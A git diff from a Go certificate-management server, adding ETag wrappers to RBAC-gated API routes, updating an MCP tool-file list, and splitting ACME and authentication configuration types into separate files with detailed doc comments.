r.Register("GET /api/v1/jobs", rbacGate(reg.Checker, "job.read", reg.Jobs.ListJobs))
|
r.Register("GET /api/v1/jobs", rbacGate(reg.Checker, "job.read", etaggedFunc(reg.Jobs.ListJobs)))
|
||||||
r.Register("GET /api/v1/jobs/{id}", rbacGate(reg.Checker, "job.read", reg.Jobs.GetJob))
|
r.Register("GET /api/v1/jobs/{id}", rbacGate(reg.Checker, "job.read", reg.Jobs.GetJob))
|
||||||
r.Register("POST /api/v1/jobs/{id}/cancel", rbacGate(reg.Checker, "job.cancel", reg.Jobs.CancelJob))
|
r.Register("POST /api/v1/jobs/{id}/cancel", rbacGate(reg.Checker, "job.cancel", reg.Jobs.CancelJob))
|
||||||
r.Register("POST /api/v1/jobs/{id}/approve", rbacGate(reg.Checker, "approval.approve", reg.Jobs.ApproveJob))
|
r.Register("POST /api/v1/jobs/{id}/approve", rbacGate(reg.Checker, "approval.approve", reg.Jobs.ApproveJob))
|
||||||
@@ -695,7 +732,7 @@ func (r *Router) RegisterHandlers(reg HandlerRegistry) {
|
|||||||
r.Register("GET /api/v1/agent-groups/{id}/members", rbacGate(reg.Checker, "agent.read", reg.AgentGroups.ListAgentGroupMembers))
|
r.Register("GET /api/v1/agent-groups/{id}/members", rbacGate(reg.Checker, "agent.read", reg.AgentGroups.ListAgentGroupMembers))
|
||||||
|
|
||||||
// Audit routes: /api/v1/audit
|
// Audit routes: /api/v1/audit
|
||||||
r.Register("GET /api/v1/audit", rbacGate(reg.Checker, "audit.read", reg.Audit.ListAuditEvents))
|
r.Register("GET /api/v1/audit", rbacGate(reg.Checker, "audit.read", etaggedFunc(reg.Audit.ListAuditEvents)))
|
||||||
// Audit 2026-05-10 HIGH-11 closure — `audit.export` permission was
|
// Audit 2026-05-10 HIGH-11 closure — `audit.export` permission was
|
||||||
// already seeded into r-admin + r-auditor (migration 000031), but
|
// already seeded into r-admin + r-auditor (migration 000031), but
|
||||||
// no endpoint enforced it pre-fix; r-auditor's claim was misleading
|
// no endpoint enforced it pre-fix; r-auditor's claim was misleading
|
||||||
@@ -765,7 +802,7 @@ func (r *Router) RegisterHandlers(reg HandlerRegistry) {
|
|||||||
|
|
||||||
// Discovery routes: /api/v1/discovered-certificates, /api/v1/discovery-scans
|
// Discovery routes: /api/v1/discovered-certificates, /api/v1/discovery-scans
|
||||||
r.Register("POST /api/v1/agents/{id}/discoveries", rbacGate(reg.Checker, "discovery.run", reg.Discovery.SubmitDiscoveryReport))
|
r.Register("POST /api/v1/agents/{id}/discoveries", rbacGate(reg.Checker, "discovery.run", reg.Discovery.SubmitDiscoveryReport))
|
||||||
r.Register("GET /api/v1/discovered-certificates", rbacGate(reg.Checker, "discovery.read", reg.Discovery.ListDiscovered))
|
r.Register("GET /api/v1/discovered-certificates", rbacGate(reg.Checker, "discovery.read", etaggedFunc(reg.Discovery.ListDiscovered)))
|
||||||
r.Register("GET /api/v1/discovered-certificates/{id}", rbacGate(reg.Checker, "discovery.read", reg.Discovery.GetDiscovered))
|
r.Register("GET /api/v1/discovered-certificates/{id}", rbacGate(reg.Checker, "discovery.read", reg.Discovery.GetDiscovered))
|
||||||
r.Register("POST /api/v1/discovered-certificates/{id}/claim", rbacGate(reg.Checker, "discovery.claim", reg.Discovery.ClaimDiscovered))
|
r.Register("POST /api/v1/discovered-certificates/{id}/claim", rbacGate(reg.Checker, "discovery.claim", reg.Discovery.ClaimDiscovered))
|
||||||
r.Register("POST /api/v1/discovered-certificates/{id}/dismiss", rbacGate(reg.Checker, "discovery.claim", reg.Discovery.DismissDiscovered))
|
r.Register("POST /api/v1/discovered-certificates/{id}/dismiss", rbacGate(reg.Checker, "discovery.claim", reg.Discovery.DismissDiscovered))
|
||||||
|
|||||||
@@ -64,14 +64,30 @@ var (
|
|||||||
|
|
||||||
// mcpToolFiles returns the paths of the (non-test) Go files under
// <repo>/internal/mcp that are expected to register MCP tools.
//
// Phase 9 Sprint 10 (commit fbe053aa, 2026-05-14) split tools.go into
// six tool-domain sibling files in the same `mcp` package
// (tools_certificates.go, tools_agents.go, tools_resources.go,
// tools_jobs.go, tools_discovery.go, tools_admin.go). The original
// tools.go now holds only the RegisterTools dispatcher, the Bundle-3
// fence wrappers and the paginationQuery helper — zero mcp.AddTool
// calls. The returned list is the union of the pre-Sprint-10 files and
// the Sprint-10 siblings, in that order.
func mcpToolFiles(repo string) []string {
	fileNames := []string{
		// Pre-Sprint-10 catalogue.
		"tools.go",
		"tools_audit_fix.go",
		"tools_auth.go",
		"tools_auth_bundle2.go",
		"tools_est.go",
		// Phase 9 Sprint 10 sibling files.
		"tools_certificates.go",
		"tools_agents.go",
		"tools_resources.go",
		"tools_jobs.go",
		"tools_discovery.go",
		"tools_admin.go",
	}

	mcpDir := filepath.Join(repo, "internal", "mcp")
	paths := make([]string, 0, len(fileNames))
	for _, name := range fileNames {
		paths = append(paths, filepath.Join(mcpDir, name))
	}
	return paths
}
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,262 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
import "time"
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 2 (2026-05-14): extracted from
|
||||||
|
// config.go to reduce its change-risk hotspot footprint. Three
|
||||||
|
// related types live here:
|
||||||
|
//
|
||||||
|
// ACMEConfig — the issuer-connector (consumer) side:
|
||||||
|
// we are a CLIENT talking UP to an ACME
|
||||||
|
// CA (Let's Encrypt, pebble, step-ca).
|
||||||
|
// CERTCTL_ACME_* prefix.
|
||||||
|
// ACMEServerConfig — the server-side ACME (RFC 8555 + RFC
|
||||||
|
// 9773) configuration: we ARE the ACME
|
||||||
|
// server, exposing /acme/profile/<id>/*
|
||||||
|
// to cert-manager / lego / acme.sh
|
||||||
|
// clients. CERTCTL_ACME_SERVER_* prefix
|
||||||
|
// (deliberately distinct from the
|
||||||
|
// consumer namespace).
|
||||||
|
// ACMEServerDirectoryMeta — the optional `meta` block of the ACME
|
||||||
|
// directory document, populated from
|
||||||
|
// CERTCTL_ACME_SERVER_TOS_URL / WEBSITE
|
||||||
|
// / CAA_IDENTITIES / EAB_REQUIRED.
|
||||||
|
//
|
||||||
|
// Every field, doc-comment, and exported name is byte-identical to
|
||||||
|
// the pre-split form. The structs live in the same `config` package
|
||||||
|
// so every caller's `config.ACMEConfig` etc. import path is
|
||||||
|
// preserved without modification.
|
||||||
|
//
|
||||||
|
// Public-surface invariant: `go doc internal/config ACMEConfig` and
|
||||||
|
// `go doc internal/config ACMEServerConfig` produce identical output
|
||||||
|
// before and after this split.
|
||||||
|
|
||||||
|
// ACMEConfig holds the settings for the ACME issuer connector.
type ACMEConfig struct {
	// DirectoryURL is the URL of the ACME directory used for certificate
	// issuance, for example
	// "https://acme-v02.api.letsencrypt.org/directory" (Let's Encrypt),
	// "https://acme.zerossl.com/v2/DV90" (ZeroSSL), or the directory of a
	// custom CA.
	DirectoryURL string

	// Email is the address registered with the ACME account. The ACME CA
	// uses it for certificate expiration notices and account recovery.
	Email string

	// ChallengeType picks the ACME challenge mechanism used for domain
	// validation. Valid values:
	//   - "http-01" (default; requires a public HTTP endpoint)
	//   - "dns-01" (a DNS TXT record per renewal)
	//   - "dns-persist-01" (a standing DNS record)
	// Default: "http-01".
	ChallengeType string

	// DNSPresentScript is the path of the shell script that creates DNS
	// TXT records. It is required for the dns-01 and dns-persist-01
	// challenge types. The script is given these environment variables:
	//   - CERTCTL_DNS_DOMAIN: domain being validated (e.g., "example.com")
	//   - CERTCTL_DNS_FQDN: full record name (e.g., "_acme-challenge.example.com" or "_validation-persist.example.com")
	//   - CERTCTL_DNS_VALUE: TXT record value (key authorization digest for dns-01, or issuer domain info for dns-persist-01)
	//   - CERTCTL_DNS_TOKEN: ACME challenge token
	// Example: /opt/dns-scripts/add-record.sh
	DNSPresentScript string

	// DNSCleanUpScript is the path of the shell script that removes DNS
	// TXT records. It is only used for dns-01 challenges, to clean up the
	// temporary validation records, and receives the same environment
	// variables as DNSPresentScript. Leave it empty when no cleanup is
	// needed (e.g., dns-persist-01).
	DNSCleanUpScript string

	// DNSPersistIssuerDomain is the issuer domain written into
	// dns-persist-01 standing records, e.g. "letsencrypt.org" or
	// "zerossl.com". It is only used when ChallengeType is
	// "dns-persist-01". The resulting record value is:
	// "<issuer_domain>; accounturi=<acme_account_uri>"
	DNSPersistIssuerDomain string

	// Profile names the ACME certificate profile sent with newOrder
	// requests. Let's Encrypt supports "tlsserver" (standard TLS) and
	// "shortlived" (6-day certs). Leave it empty to get the CA's default
	// profile (backward-compatible).
	// Setting: CERTCTL_ACME_PROFILE environment variable.
	Profile string

	// ARIEnabled turns on ACME Renewal Information (RFC 9773) support.
	// When it is set, the renewal scheduler asks the CA for suggested
	// renewal windows rather than relying solely on static expiration
	// thresholds. Default: false. Requires a CA that supports ARI (e.g.,
	// Let's Encrypt).
	// Setting: CERTCTL_ACME_ARI_ENABLED environment variable.
	ARIEnabled bool

	// Insecure disables TLS certificate verification for connections to
	// the ACME directory. It exists only for testing against self-signed
	// ACME servers such as Pebble. Never use it in production.
	// Setting: CERTCTL_ACME_INSECURE environment variable.
	Insecure bool

	// InsecureAck is the explicit acknowledgement that must accompany
	// Insecure (Phase 2 SEC-M4 closure, 2026-05-13): with Insecure=true,
	// Validate() refuses to start unless InsecureAck is true as well.
	// Before Phase 2 the Insecure flag merely produced a boot-time WARN
	// log; this guard turns that into a hard fail-closed gate so that the
	// dev-only escape hatch cannot be enabled by accident in production
	// through a copy-pasted Pebble runbook.
	//
	//	Acknowledged (Insecure=true + InsecureAck=true):  boot proceeds + WARN logs.
	//	Unack'd      (Insecure=true + InsecureAck=false): ErrACMEInsecureWithoutAck.
	//	Off          (Insecure=false):                    InsecureAck is ignored entirely.
	//
	// Setting: CERTCTL_ACME_INSECURE_ACK environment variable.
	InsecureAck bool
}
|
||||||
|
|
||||||
|
// ACMEServerConfig is the SERVER-side ACME (RFC 8555 + RFC 9773 ARI)
|
||||||
|
// configuration. Distinct from ACMEConfig (the consumer-side issuer
|
||||||
|
// connector that talks UP to Let's Encrypt / pebble). Server uses
|
||||||
|
// CERTCTL_ACME_SERVER_* prefix throughout to avoid colliding with
|
||||||
|
// the existing CERTCTL_ACME_* consumer namespace (DIRECTORY_URL /
|
||||||
|
// PROFILE / CHALLENGE_TYPE / etc.).
|
||||||
|
//
|
||||||
|
// Phase 1a wires Enabled / DefaultAuthMode / DefaultProfileID /
|
||||||
|
// NonceTTL / DirectoryMeta. Order/Authz TTLs + the per-challenge-type
|
||||||
|
// concurrency caps + DNS01 resolver are reserved fields populated for
|
||||||
|
// Phases 2/3 — exposing them now keeps the env-var surface stable
|
||||||
|
// from day one (operators can set CERTCTL_ACME_SERVER_HTTP01_CONCURRENCY
|
||||||
|
// today; it's a no-op until Phase 3 reads it).
|
||||||
|
type ACMEServerConfig struct {
|
||||||
|
// Enabled is the master toggle. When false, the ACME handler is
|
||||||
|
// constructed (so the registry-shape stays stable) but no routes
|
||||||
|
// are registered. Operators flip this on after configuring the
|
||||||
|
// per-profile auth_mode column on certificate_profiles.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_ENABLED.
|
||||||
|
Enabled bool
|
||||||
|
|
||||||
|
// DefaultAuthMode sets the default value of certificate_profiles.acme_auth_mode
|
||||||
|
// for NEWLY-created profiles (e.g. via API). Existing profile rows
|
||||||
|
// retain whatever value they were created with — per-profile
|
||||||
|
// values, once set, override this default. Architecture decision:
|
||||||
|
// auth mode is per-profile, not server-wide.
|
||||||
|
// Valid: "trust_authenticated" (default) or "challenge".
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_DEFAULT_AUTH_MODE.
|
||||||
|
DefaultAuthMode string
|
||||||
|
|
||||||
|
// DefaultProfileID, when set, activates the /acme/* shorthand
|
||||||
|
// path family — /acme/directory mirrors
|
||||||
|
// /acme/profile/<DefaultProfileID>/directory etc. When empty,
|
||||||
|
// requests to the shorthand return RFC 7807
|
||||||
|
// userActionRequired with a hint pointing at the per-profile
|
||||||
|
// path. Single-profile deployments can set this for ergonomic
|
||||||
|
// client config; multi-profile deployments leave it empty.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_DEFAULT_PROFILE_ID.
|
||||||
|
DefaultProfileID string
|
||||||
|
|
||||||
|
// NonceTTL is how long an issued ACME nonce remains valid before
|
||||||
|
// the server rejects it as expired. RFC 8555 §6.5.1 allows the
|
||||||
|
// server to set any TTL; 5 minutes is the operator-friendly
|
||||||
|
// default (clock-skew tolerant without enabling long-replay
|
||||||
|
// attacks). Setting: CERTCTL_ACME_SERVER_NONCE_TTL.
|
||||||
|
NonceTTL time.Duration
|
||||||
|
|
||||||
|
// OrderTTL is the lifetime of an unfulfilled ACME order. Phase 2
|
||||||
|
// reads; Phase 1a reserves the field. Default: 24h.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_ORDER_TTL.
|
||||||
|
OrderTTL time.Duration
|
||||||
|
|
||||||
|
// AuthzTTL is the lifetime of an unfulfilled authorization. Phase 2
|
||||||
|
// reads; Phase 1a reserves. Default: 24h.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_AUTHZ_TTL.
|
||||||
|
AuthzTTL time.Duration
|
||||||
|
|
||||||
|
// HTTP01ConcurrencyMax is the bound on concurrent HTTP-01 validators
|
||||||
|
// (semaphore weight). Phase 3 reads; Phase 1a reserves. Default: 10.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_HTTP01_CONCURRENCY.
|
||||||
|
HTTP01ConcurrencyMax int
|
||||||
|
|
||||||
|
// DNS01Resolver is the resolver address used by the DNS-01 validator.
|
||||||
|
// Phase 3 reads; Phase 1a reserves. Default: "8.8.8.8:53".
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_DNS01_RESOLVER.
|
||||||
|
DNS01Resolver string
|
||||||
|
|
||||||
|
// DNS01ConcurrencyMax bounds concurrent DNS-01 validators. Default: 10.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_DNS01_CONCURRENCY.
|
||||||
|
DNS01ConcurrencyMax int
|
||||||
|
|
||||||
|
// TLSALPN01ConcurrencyMax bounds concurrent TLS-ALPN-01 validators.
|
||||||
|
// Default: 10. Setting: CERTCTL_ACME_SERVER_TLSALPN01_CONCURRENCY.
|
||||||
|
TLSALPN01ConcurrencyMax int
|
||||||
|
|
||||||
|
// ARIEnabled toggles RFC 9773 ACME Renewal Information surface
|
||||||
|
// (the `renewalInfo` directory entry + GET
|
||||||
|
// /acme/profile/<id>/renewal-info/<cert-id>). Default: true.
|
||||||
|
// Operators wanting Phase-1a-style "directory + nonce + accounts +
|
||||||
|
// orders + finalize + challenges only" can flip this off; doing so
|
||||||
|
// drops the renewalInfo URL from the directory document so ACME
|
||||||
|
// clients fall back to their static renewal scheduler. Phase 4 wires.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_ARI_ENABLED.
|
||||||
|
ARIEnabled bool
|
||||||
|
|
||||||
|
// ARIPollInterval is the value the server returns in the Retry-After
|
||||||
|
// response header on a 200 ARI response — i.e., the suggested gap
|
||||||
|
// between successive ARI polls a client should respect. RFC 9773 §4.2
|
||||||
|
// leaves this server-policy. Default: 6h. Tighter intervals (e.g. 1h)
|
||||||
|
// suit short-lived certs; looser intervals (24h) suit standard 90-day
|
||||||
|
// certs. Setting: CERTCTL_ACME_SERVER_ARI_POLL_INTERVAL.
|
||||||
|
ARIPollInterval time.Duration
|
||||||
|
|
||||||
|
// RateLimitOrdersPerHour caps new-order requests per ACME account per
|
||||||
|
// rolling hour. 0 disables (no limit). Default: 100. Hits return RFC
|
||||||
|
// 7807 + RFC 8555 §6.7 `urn:ietf:params:acme:error:rateLimited` with
|
||||||
|
// a Retry-After header. In-memory token-bucket — restart wipes the
|
||||||
|
// counter, which is acceptable for orders/hour caps (eventual-
|
||||||
|
// consistency anyway). Setting:
|
||||||
|
// CERTCTL_ACME_SERVER_RATE_LIMIT_ORDERS_PER_HOUR.
|
||||||
|
RateLimitOrdersPerHour int
|
||||||
|
|
||||||
|
// RateLimitConcurrentOrders caps the number of orders an ACME account
|
||||||
|
// can have in pending/ready/processing state simultaneously. 0
|
||||||
|
// disables. Default: 5. Same Problem shape as the per-hour limit.
|
||||||
|
// Setting: CERTCTL_ACME_SERVER_RATE_LIMIT_CONCURRENT_ORDERS.
|
||||||
|
RateLimitConcurrentOrders int
|
||||||
|
|
||||||
|
// RateLimitKeyChangePerHour caps account-key rollovers per account
|
||||||
|
// per rolling hour. 0 disables. Default: 5 (rollovers should be rare;
|
||||||
|
// a flood is an attack signal). Setting:
|
||||||
|
// CERTCTL_ACME_SERVER_RATE_LIMIT_KEY_CHANGE_PER_HOUR.
|
||||||
|
RateLimitKeyChangePerHour int
|
||||||
|
|
||||||
|
// RateLimitChallengeRespondsPerHour caps challenge-respond requests
|
||||||
|
// per challenge per rolling hour. 0 disables. Default: 60 (defends
|
||||||
|
// against retry storms from a misbehaving client). Setting:
|
||||||
|
// CERTCTL_ACME_SERVER_RATE_LIMIT_CHALLENGE_RESPONDS_PER_HOUR.
|
||||||
|
RateLimitChallengeRespondsPerHour int
|
||||||
|
|
||||||
|
// GCInterval is the tick interval for the ACME GC scheduler loop.
|
||||||
|
// On each tick the loop sweeps expired nonces, transitions expired
|
||||||
|
// pending authzs to `expired`, transitions expired
|
||||||
|
// pending/ready/processing orders to `invalid`, and reaps Phase-2
|
||||||
|
// atomicity-window orphans (orders without a linked cert when one
|
||||||
|
// should exist). 0 disables the loop entirely. Default: 1m. Setting:
|
||||||
|
// CERTCTL_ACME_SERVER_GC_INTERVAL.
|
||||||
|
GCInterval time.Duration
|
||||||
|
|
||||||
|
// DirectoryMeta is the optional metadata advertised in the directory
|
||||||
|
// document per RFC 8555 §7.1.1.
|
||||||
|
DirectoryMeta ACMEServerDirectoryMeta
|
||||||
|
}
|
||||||
|
|
||||||
|
// ACMEServerDirectoryMeta carries the optional fields of the ACME
// directory document's `meta` block. Each field is populated from a
// CERTCTL_ACME_SERVER_* env var; when every field is empty, the
// directory's JSON `meta` field is suppressed via omitempty.
type ACMEServerDirectoryMeta struct {
	// TermsOfService is the URL of the operator's ToS document.
	// Setting: CERTCTL_ACME_SERVER_TOS_URL.
	TermsOfService string

	// Website is the URL of the operator's homepage.
	// Setting: CERTCTL_ACME_SERVER_WEBSITE.
	Website string

	// CAAIdentities lists the CAA-record domain values that clients
	// should authorize for this server.
	// Setting: CERTCTL_ACME_SERVER_CAA_IDENTITIES (comma-separated).
	CAAIdentities []string

	// ExternalAccountRequired, when true, tells clients that new-account
	// requires an EAB token (RFC 8555 §7.3.4). Phase 1a advertises the
	// flag but does not enforce it; EAB enforcement is a follow-up.
	// Setting: CERTCTL_ACME_SERVER_EAB_REQUIRED.
	ExternalAccountRequired bool
}
|
||||||
@@ -0,0 +1,601 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package config
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"log/slog"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 5 (2026-05-14): extracted from
|
||||||
|
// config.go. The largest split so far and the first to move
|
||||||
|
// EXPORTED helpers — every external importer of
|
||||||
|
// config.AuthType / config.AuthTypeNone / config.AuthTypeAPIKey /
|
||||||
|
// config.AuthTypeOIDC / config.ValidAuthTypes / config.ParseNamedAPIKeys
|
||||||
|
// resolves the same after the move because the package name stays
|
||||||
|
// `config`. Public-surface invariant is verified by:
|
||||||
|
//
|
||||||
|
// - broader-importer build: cmd/server/main.go + auth_backfill.go
|
||||||
|
// reference config.AuthType + config.AuthTypeNone +
|
||||||
|
// config.AuthTypeAPIKey + config.AuthTypeOIDC +
|
||||||
|
// config.ValidAuthTypes — all compile clean after the move.
|
||||||
|
// - internal/auth/middleware.go and internal/api/handler/health.go
|
||||||
|
// reference config.AuthType in doc comments + type fields.
|
||||||
|
// - go test ./internal/config/... — package tests (including
|
||||||
|
// config_test.go which pins "jwt" out of ValidAuthTypes per G-1)
|
||||||
|
// stay green.
|
||||||
|
//
|
||||||
|
// What lives here
|
||||||
|
// ===============
|
||||||
|
// Five types (one ergonomic enum + four config structs):
|
||||||
|
//
|
||||||
|
// NamedAPIKey — one named API-key entry with optional
|
||||||
|
// admin flag. Used by the authentication
|
||||||
|
// middleware for actor attribution in the
|
||||||
|
// audit trail (M-002 / M-003).
|
||||||
|
// AuthType (+ const) — the discriminator for the API auth
|
||||||
|
// middleware shape, with three named
|
||||||
|
// constants (AuthTypeAPIKey / AuthTypeNone /
|
||||||
|
// AuthTypeOIDC). The G-1 invariant pins
|
||||||
|
// "jwt" OUT of this set forever.
|
||||||
|
// AuthConfig — the top-level authentication configuration
|
||||||
|
// (Type, Secret, NamedKeys, AgentBootstrapToken,
|
||||||
|
// DemoModeAck + TS, OIDC pre-login binding
|
||||||
|
// knobs, embedded Session + Breakglass +
|
||||||
|
// the bootstrap-admin-group surface).
|
||||||
|
// SessionConfig — Auth Bundle 2 Phase 4 session-service
|
||||||
|
// tunables (idle / absolute / signing-key
|
||||||
|
// retention / GC / SameSite / IP+UA bind).
|
||||||
|
// BreakglassConfig — Auth Bundle 2 Phase 7.5 local-password
|
||||||
|
// break-glass tunables (enabled gate +
|
||||||
|
// lockout-threshold / duration / reset).
|
||||||
|
//
|
||||||
|
// Two exported helpers (FIRST sprint to move public-API helpers):
|
||||||
|
//
|
||||||
|
// ValidAuthTypes() — single source of truth for the allowed
|
||||||
|
// CERTCTL_AUTH_TYPE set. Called from:
|
||||||
|
// - cmd/server/main.go (runtime guard)
|
||||||
|
// - the validator in config.go
|
||||||
|
// - the helm chart template
|
||||||
|
// - the property test in config_test.go
|
||||||
|
// that pins "jwt" out of the slice.
|
||||||
|
// ParseNamedAPIKeys() — parses the CERTCTL_API_KEYS_NAMED env-var
|
||||||
|
// into a []NamedAPIKey with rotation-aware
|
||||||
|
// duplicate-name handling (L-004 contract).
|
||||||
|
//
|
||||||
|
// One unexported helper:
|
||||||
|
//
|
||||||
|
// isValidKeyName() — alphanumeric + hyphen + underscore
|
||||||
|
// validator for the Name field of
|
||||||
|
// NamedAPIKey. Only called from
|
||||||
|
// ParseNamedAPIKeys (intra-file edge
|
||||||
|
// after the move).
|
||||||
|
//
|
||||||
|
// What stayed in config.go
|
||||||
|
// ========================
|
||||||
|
// - ErrAgentBootstrapTokenRequired sentinel (top of config.go, in
|
||||||
|
// the Phase-2 sentinel block) — tied to Validate()'s behavior,
|
||||||
|
// not to AuthConfig's struct shape. Same precedent as Sprint 2's
|
||||||
|
// ErrACMEInsecureWithoutAck (which also stayed in config.go).
|
||||||
|
// ErrDemoModeAckExpired likewise (same reasoning).
|
||||||
|
// - The Validate() body that branches on AuthType / DemoModeAck /
|
||||||
|
// AgentBootstrapTokenDenyEmpty — cross-cutting validation that
|
||||||
|
// stays where the other Validate() branches live.
|
||||||
|
// - The Load() body that calls ParseNamedAPIKeys() and synthesizes
|
||||||
|
// the AuthConfig + SessionConfig + BreakglassConfig zero-values.
|
||||||
|
// - The shared getEnv / getEnvBool / getEnvInt / getEnvDuration
|
||||||
|
// helpers + splitComma + trimSpace (used by ParseNamedAPIKeys),
|
||||||
|
// shared across every config family.
|
||||||
|
//
|
||||||
|
// Public-surface invariant: go doc internal/config AuthConfig /
|
||||||
|
// SessionConfig / BreakglassConfig / NamedAPIKey / AuthType /
|
||||||
|
// AuthTypeAPIKey / AuthTypeNone / AuthTypeOIDC / ValidAuthTypes /
|
||||||
|
// ParseNamedAPIKeys all produce identical output before and after
|
||||||
|
// this split.
|
||||||
|
|
||||||
|
// NamedAPIKey is one named API-key entry, optionally flagged as admin.
// Naming keys gives the audit trail a real actor to attribute requests to
// (M-002), and the admin flag is the basis for gating privileged endpoints
// such as bulk revocation (M-003).
type NamedAPIKey struct {
	// Name identifies the key (alphanumeric characters, hyphens and
	// underscores). It is recorded as the actor on every audit event the
	// key authenticates.
	Name string

	// Key is the raw API-key secret that the client presents as
	// `Authorization: Bearer <key>`.
	Key string

	// Admin reports whether the key carries admin privileges (bulk
	// revocation, etc.).
	Admin bool
}
|
||||||
|
|
||||||
|
// AuthType discriminates which shape the API auth middleware takes. It is
// a string-backed type, so values still round-trip through the environment
// (they flow through getEnv as plain strings) while switches and validation
// get a typed surface. Prefer the named constants over string literals, so
// that adding or removing an enum member is caught at compile time.
//
// G-1 (P1): before G-1, the validAuthTypes map literal accepted "jwt" even
// though no JWT middleware existed behind it. That was a silent auth
// downgrade: the configured type was logged as "jwt", yet every request was
// routed through the api-key bearer middleware regardless. Operators who set
// CERTCTL_AUTH_TYPE=jwt believed they had JWT auth; they did not. This type
// together with the ValidAuthTypes() helper makes the allowed set a single
// source of truth shared by config validation, the defense-in-depth runtime
// switch in main.go, and the helm-chart template guard
// (`certctl.validateAuthType`).
type AuthType string
|
||||||
|
|
||||||
|
const (
|
||||||
|
// AuthTypeAPIKey routes requests through the api-key bearer middleware.
|
||||||
|
// CERTCTL_AUTH_SECRET (or CERTCTL_API_KEYS_NAMED) is required.
|
||||||
|
AuthTypeAPIKey AuthType = "api-key"
|
||||||
|
|
||||||
|
// AuthTypeNone disables authentication entirely. Development only —
|
||||||
|
// the server logs a loud Warn at startup. Operators who need
|
||||||
|
// JWT/OIDC/mTLS run an authenticating gateway (oauth2-proxy / Envoy
|
||||||
|
// ext_authz / Traefik ForwardAuth / Pomerium) in front of certctl
|
||||||
|
// and set this value on the upstream certctl process. See
|
||||||
|
// docs/architecture.md "Authenticating-gateway pattern".
|
||||||
|
AuthTypeNone AuthType = "none"
|
||||||
|
|
||||||
|
// AuthTypeOIDC (Auth Bundle 2 Phase 0) reserves the literal that the
|
||||||
|
// OIDC handler chain (Bundle 2 Phase 5+6) consumes. Pre-Bundle-2
|
||||||
|
// behavior: the literal is allowed by the validator but the handler
|
||||||
|
// chain is not yet wired, so the runtime guard in cmd/server/main.go
|
||||||
|
// surfaces a clear "oidc auth-type configured but Bundle 2 handlers
|
||||||
|
// not registered" error rather than silently falling back to api-key
|
||||||
|
// (the failure mode that drove G-1's jwt-literal removal). Once
|
||||||
|
// Bundle 2's session middleware + OIDC service ship, the runtime
|
||||||
|
// guard relaxes and CERTCTL_AUTH_TYPE=oidc routes through them.
|
||||||
|
//
|
||||||
|
// Note: this is the AUTH-TYPE literal value, NOT the JWT alg literal.
|
||||||
|
// ID tokens are JWTs internally but the auth-type config string is
|
||||||
|
// "oidc". The G-1 closure test (TestValidAuthTypesDoesNotContainJWT)
|
||||||
|
// stays passing because "jwt" is never added back to the slice.
|
||||||
|
AuthTypeOIDC AuthType = "oidc"
|
||||||
|
)
|
||||||
|
|
||||||
|
// ValidAuthTypes returns the allowed CERTCTL_AUTH_TYPE values. The set is
|
||||||
|
// intentionally narrow — JWT was accepted pre-G-1 with no middleware
|
||||||
|
// implementation behind it. Single source of truth referenced by the
|
||||||
|
// validator below, the runtime guard in cmd/server/main.go, the helm
|
||||||
|
// chart template (`certctl.validateAuthType`), and the property test in
|
||||||
|
// config_test.go that pins "jwt" out of the slice forever.
|
||||||
|
//
|
||||||
|
// Bundle 2 Phase 0 adds AuthTypeOIDC to the slice. The G-1 invariant
|
||||||
|
// remains: "jwt" stays out of the allowed set forever; OIDC ID tokens
|
||||||
|
// are JWTs internally but the auth-type literal is "oidc", so the
|
||||||
|
// silent-downgrade attack surface that "jwt" represented does not
|
||||||
|
// regress.
|
||||||
|
func ValidAuthTypes() []AuthType {
|
||||||
|
return []AuthType{AuthTypeAPIKey, AuthTypeNone, AuthTypeOIDC}
|
||||||
|
}
|
||||||
|
|
||||||
|
// AuthConfig contains authentication configuration.
|
||||||
|
type AuthConfig struct {
|
||||||
|
// Type sets the authentication mechanism for the REST API.
|
||||||
|
// Valid values: "api-key" (default, production) and "none" (development
|
||||||
|
// only — disables authentication on the API and logs a loud Warn at
|
||||||
|
// startup). For JWT/OIDC, run an authenticating gateway (oauth2-proxy /
|
||||||
|
// Envoy / Traefik ForwardAuth / Pomerium) in front of certctl and set
|
||||||
|
// CERTCTL_AUTH_TYPE=none on the upstream — see docs/architecture.md
|
||||||
|
// "Authenticating-gateway pattern" and docs/upgrade-to-v2-jwt-removal.md.
|
||||||
|
// Setting: CERTCTL_AUTH_TYPE environment variable. Default: "api-key".
|
||||||
|
// Use the AuthType constants (AuthTypeAPIKey / AuthTypeNone) for typed
|
||||||
|
// comparisons; the field stays `string` to preserve env-var roundtrip
|
||||||
|
// shape used by getEnv() and downstream Helm/compose interpolation.
|
||||||
|
Type string
|
||||||
|
|
||||||
|
// Secret is the legacy authentication secret (comma-separated API keys).
|
||||||
|
// DEPRECATED in favor of NamedKeys — retained for backward compatibility.
|
||||||
|
// When NamedKeys is empty and Secret is set, each comma-separated key is
|
||||||
|
// registered as a synthesized named key (legacy-key-0, legacy-key-1, ...)
|
||||||
|
// with actor attribution defaulting to "legacy-key-<index>".
|
||||||
|
// Setting: CERTCTL_AUTH_SECRET environment variable.
|
||||||
|
Secret string
|
||||||
|
|
||||||
|
// NamedKeys is the parsed set of named API keys. Populated from
|
||||||
|
// CERTCTL_API_KEYS_NAMED via ParseNamedAPIKeys during Load(). When
|
||||||
|
// non-empty, this takes precedence over the legacy Secret field.
|
||||||
|
// Setting: CERTCTL_API_KEYS_NAMED="name1:key1,name2:key2:admin"
|
||||||
|
NamedKeys []NamedAPIKey
|
||||||
|
|
||||||
|
